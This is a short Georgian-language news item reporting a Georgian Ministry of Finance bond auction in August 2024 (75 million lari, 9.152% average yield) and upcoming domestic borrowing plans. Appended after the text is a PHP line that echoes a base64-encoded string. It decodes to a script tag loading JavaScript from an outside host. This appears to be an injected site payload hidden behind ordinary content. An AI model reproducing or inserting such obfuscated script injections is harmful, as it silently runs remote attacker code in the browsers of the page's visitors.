celsiusi
ავერსი საქკაბელი

 Galt & Taggart-ის ინფორმაციით, საქართველოს ფინანსთა სამინისტრომ 2024 წლის 20 აგვისტოს 6.9-წლიანი 75 მლნ ლარის (27.9 მლნ აშშ დოლარის) ოდენობის ობლიგაციების ემისია განახორციელა. Galt & Taggart-ის მიმოხილვის თანახმად, ამ ფასიან ქაღალდებზე მოთხოვნა 2.7-ჯერ მაღალი იყო და საშუალო შეწონილი საპროცენტო განაკვეთი წინა აუქციონთან შედარებით 0.646პპ-ით შემცირდა და 9.152% შეადგინა.

"უახლესი აუქციონი დაგეგმილია 2024 წლის 27 აგვისტოს, სადაც 5-წლიანი 85 მლნ ლარის ნომინალური ღირებულების ბენჩმარკ ობლიგაციები გაიყიდება,"- ნათქვამია ფინანსთა სამინისტროს მიერ გავრცელებულ ინფორმაციაში.

2024 წლის განმავლობაში ფინანსთა სამინისტრო სახაზინო ობლიგაციებისა და სახაზინო ვალდებულებების გამოშვებით 1.5 მილიარდი ლარის შიდა ვალის აღებას გეგმავს.

117
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");